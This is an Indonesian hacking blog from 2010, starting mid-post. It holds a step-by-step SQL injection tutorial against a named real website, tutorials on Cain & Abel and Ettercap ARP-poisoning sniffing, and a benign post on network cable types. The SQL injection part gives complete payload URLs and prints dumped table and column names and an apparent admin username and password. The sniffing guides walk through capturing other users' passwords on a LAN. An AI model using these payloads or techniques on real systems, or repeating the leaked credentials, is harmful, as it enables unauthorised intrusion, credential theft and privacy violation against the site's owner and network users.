2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')

http://www.natoleo.com/Content.php?id=14 order by 5--

jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)


3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14

http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--

akan muncul "angka ajaib" : 1


4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.

http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--

muncul tulisan :5.0.51a-community


5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--

muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome


6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273

tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--

muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id

kita ambil : member_login,member_password


7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL

ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--

hasilnya akan muncul:

user: wilmarnatoleo

pass: natoleoP@ssword

sekarang tinggal login ke website target..

http://www.natoleo.com/admin/

Say No to Malingsial. Semoga berhasil kawan..

Wednesday, 8 December 2010

Menggunakan Cain & Able

Cain & Able adalah sebuah software yang dapat digunakan untuk melakukan hacking via LAN (snifing). Untuk menggunakannya kita hanya perlu mengetahui sedikit tentang commend prompt. Mengapa? Karena dari sana kita akan memperoleh informasi tentang IP Adress kita dan IP Adress server. Jika kita telah mengetahui IP adress tersebut, barulah kita dapat melakukan proses hacking via LAN (snifing).

1. Silahkan download Cain & Able di sini.

2. Jika telah selesai mendownload, langsung aja di instal di komputer kamu,,,,,,,,, maka akan tampil iconnya di dekstop.

3. Sebelum membuka Software tersebut, liat dulu IP adress kita dan server di commend prompt(CMD) dengan mengetikkan ipconfig. Maka akan tampil gambar seperti ini :

1

4. Jika kita telah mengetahui IP adress, barulah kita klik icon cain di dekstop. Berikut adalah gambar-gambar proses penggunaan cain.

a.Klik start ARP dan start snifing, lihat gambar :2

b. setelah itu klik tab snifing lalu klik kanan dan pilih scan MAC adress, lihat gambar : 3

4

c. Klik tab ARP di bagian bawah, lalu klik tanda tambah “+” untuk add, maka akan keluar kotak dialog seperti gambar dibawah ini.

5

d. Pada kotak kiri klik IP server dan pada kotak kanan klik IP korban. Lakukan berulang-ulang untuk nge-hack semua IP adress korban yang ada.

e. Setelah selesai maka akan dilakukan proses poisoning terhadap semua IP korban.

6

f. Untuk hasilnya, silahkan klik tab password pada bagian bawah dan klik HTTP, lihat gambar,7

Tulisan ini saya buat hanya untuk membagi pengetahuan saya tentang hacking. Jadi, jika anda telah dapat melakukan hel tersebut, jangan sampai membuat anda menjadi orang yang jahat. Lakukanlah semua itu hanya karna kesenangan bukan karna ingin merugikan orang lain. Marilah kita bersama-sama menjadi hacker yang cinta damai.

original site: http://anaksapek.wordpress.com

Saturday, 27 November 2010

Perbedaan kabel STRAIGHT dan CROSS

Untuk menghubungkan dua buah komputer atau menghubungkan dua buah HUB/Switch dengan kabel UTP, dapat menggunakan kabel crossover. Jika mau menghubungkan komputer ke HUB/Switch, gunakan kabel straight.

Dalam pengkabelan straight dan cross, kita bisa lihat standar yang sudah ditetapkan untuk masalah pengkabelan ini, EIA/TIA 568A dan EIA/TIA 568B.

EIA/TIA 568A --- EIA/TIA 568B


Kabel Straight
Kabel straight adalah istilah untuk kabel yang menggunakan standar yang sama pada kedua ujung kabelnya, bisa EIA/TIA 568A atau EIA/TIA 568B pada kedua ujung kabel. Sederhananya, urutan warna pada kedua ujung kabel sama. Pada kabel straight, pin 1 di salah satu ujung kabel terhubung ke pin 1 pada ujung lainnya, pin 2 terhubung ke pin 2 di ujung lainnya, dan seterusnya.

Jadi, ketika PC mengirim data pada pin 1 dan 2 lewat kabel straight ke Switch, Switch menerima data pada pin 1 dan 2. Nah, karena pin 1 dan 2 pada switch tidak akan digunakan untuk mengirim data sebagaimana halnya pin 1 dan 2 pada PC, maka Switch
menggunakan pin 3 dan 6 untuk mengirim data ke PC, karena PC menerima data pada pin 3 dan 6.

Lebih detailnya, lihat gambar berikut : [klik untuk memperbesar]

Kabel Straight

Penggunaan kabel straight :
menghubungkan komputer ke port biasa di Switch.
menghubungkan komputer ke port LAN modem cable/DSL.
menghubungkan port WAN router ke port LAN modem cable/DSL.
menghubungkan port LAN router ke port uplink di Switch.
menghubungkan 2 HUB/Switch dengan salah satu HUB/Switch menggunakan port uplink dan yang lainnya menggunakan port biasa

Kabel crossover
Kabel crossover menggunakan EIA/TIA 568A pada salah satu ujung kabelnya dan EIA/TIA 568B pada ujung kabel lainnya.
Kabel Crossover

Pada gambar, pin 1 dan 2 di ujung A terhubung ke pin 3 dan 6 di ujung B, begitu pula pin 1 dan 2 di ujung B yang terhubung ke pin 3 dan 6 di ujung A. Jadi, pin 1 dan 2 pada setiap ujung kabel digunakan untuk mengirim data, sedangkan pin 3 dan 6 pada setiap ujung kabel digunakan untuk menerima data, karena pin 1 dan 2 saling terhubung secara berseberangan dengan pin 3 dan 6.

Untuk mengenali sebuah kabel apakah crossover ataupun straight adalah dengan hanya melihat salah satu ujung kabel. Jika urutan warna kabel pada pin 1 adalah Putih Hijau, maka kabel tersebut adalah kabel crossover (padahal jika ujung yang satunya lagi juga memiliki urutan warna yang sama yaitu Putih Hijau sebagai pin 1, maka kabel tersebut adalah kabel Straight). Tapi untungnya, kebanyakan kabel menggunakan standar EIA/TIA 568B pada kedua ujung kabelnya.

Penggunaan kabel crossover :
menghubungkan 2 buah komputer secara langsung
menghubungkan 2 buah HUB/Switch menggunakan port biasa diantara kedua HUB/Switch.
menghubungkan komputer ke port uplink Switch
menghubungkan port LAN router ke port biasa di HUB/Switch

Port biasa VS Port uplink
Untuk menghubungkan dua buah HUB/Switch atau menghubungkan dua buah komputer secara langsung dibutuhkan kabel crossover. Tapi jika HUB/Switch atau Network Interface Card (NIC) atau peralatan network lainnya menyediakan Uplinkport atau MDI/MDI-X anda bisa menggunakan kabel straight untuk menghubungkan ke port biasa di HUB/Switch atau Network Interface Card atau peralatan network lainnya.

Thursday, 28 October 2010

Sniffing Using Ettercap

Di post ini saya mo demo’in tentang sebuah tool yang cukup maknyoos untuk melakukan packet sniffing pada perangkat switch. Oh ya ini kategori ilmu buaahayaa. Hem, supaya para pembaca yang awam pun bisa menikmati posting saya yang penuh dengan ilmu2 yang bermanfaat ini, saya jelaskan satu2 dan perlahan-lahan

1. Apa itu Packet?

Packet adalah kumpulan informasi yang kita kirimkan kepada perangkat (komputer, server, printer dsb) yang terletak pada jaringan intranet maupun internet. Bayangkan saja packet itu seperti suara anda ketika berbicara dengan orang lain. Ketika anda berbincang dengan orang lain, suara anda juga bisa didengar orang lain bukan? Lalu gimana jika ada seseorang menguping pembicaraan anda yang penting dan bersifat private, nggak seneng tho. Nah permasalahan inilah yang nanti saya bahas di posting ini.

2. Apa itu Switch?

Nah untuk berbincang – bincang dengan temen anda, pasti ada medium yang mengantarkan suara2 anda supaya bisa didenger kan? Kalo di dunia nyata kita tahu medium penghantarnya udara. Nah kalo di jaringan ada banyak medium penghantarnya, contoh: switch, hub, router dsb. Untuk kali ini kita kosentrasi ma switch aja dulu. Gimana sih cara switch menghantarkan paket2 di jaringan? Nah, cara berkomunikasi perangkat tu ada 4 macam (kalo saya nggak salah sih : multicast, broadcast, anycast dan unicast.

Pada switch cara berkomunikasinya adalah multicast dan unicast, intinya paket yang anda kirim dijamin nggak bakal salah sasaran, hanya orang yang berhak aja yang bisa dapat paket2 anda. So, kalo anda lagi ngegosip, orang lain nggak bakal denger apa yang anda omongin. Lalu bagaimana switch mengetahui bahwa paket yang dikirim itu tepat sasaran, caranya dengan mengirimkan paket ARP (Address Resolution Protocol) . Switch akan mencatatat alamat mac address (alamat fisik pada komputer anda) serta alamat IP (alamat nggak fisik ). Alamat fisik diibaratkan alamat rumah anda, alamat yang nggak brubah-ubah, sedangkan non fisik bisa aja no hp anak2 SMA yang hobi gonta ganti nomor, tapi nggak mungkin kan mreka gonta-ganti alamat rumah (kecuali ciblek or ayam kampus tentunya). Jadi meski anda gonta-ganti IP, switch nggak akan salah kirim paket.

3. Apa itu MITM (men in the middle attack)?

MITM

MITM

MITM adalah jenis serangan dengan berpura – pura menjadi user yang sah. Pada switch caranya dengan memalsukan dan memflood ARP response (ARP spoofing). Jadi ketika switch menanyakan alamat fisik setiap alamat IP, maka penyerang akan mengirimkan mac address alamat penyerang kepada switch untuk setiap alamat IP yang ditanyakan oleh swith. Jadi ketika switch tanya “Hoii, alamat mac address IP 10.14.10.2 apa?” maka penyerang akan membalasnya dengan alamat fisiknya, dan ini dilakukan untuk setiap IP komputer2 korban. Akhirnya setiap paket oleh switch akan dikirimkan oleh komputer penyerang (intinya, komputer penyerang tahu setiap paket yang serharusnya dia nggak tahu). Supaya korban nggak curiga kalo paketnya dah dicolong, maka penyerang akan memforward paket yg terlebih dahulu sudah dibaca oleh penyerang. Jadi si korban nggak akan curiga kalo tiba2 paketnya hilang. Komputer penyerang seolah – olah akan menjadi jembatan (bridge) antara komputer sah dengan komputer yang lain.

Cukup ngemeng2nya, sung demonya (di linux box):

1. suryo@daskom-admin:~$sudo ettercap -G -n 255.255.255.0 (akan muncul GUI ettercap seperti dibawah)

ettercap-gui

ettercap-gui

2. Klik sniff pilih unified sniffing, saya menggunakan lan card saya ketiga (eth2), saya punya 3 lan card di komputer saya.

memilih ethernet

memilih ethernet

3. Klik host, pilih scan for host.

4. Klik MITM pilih arp poisoning, plih sniff remote connections.

sniffing remote connections

sniffing remote connections

5. Klik start, pilih start sniffing.

6. Tuk melihat koneksi, klik view klik connections.

)

daftar korban

Dibawah ini hasil dari paket sniffing dengan ettercap, perhatikan ada seorang user yang memasukkan user dan passwordnya.

Got U'r Password

Got U'r Password

original site:http://pranotoutomo.wordpress.com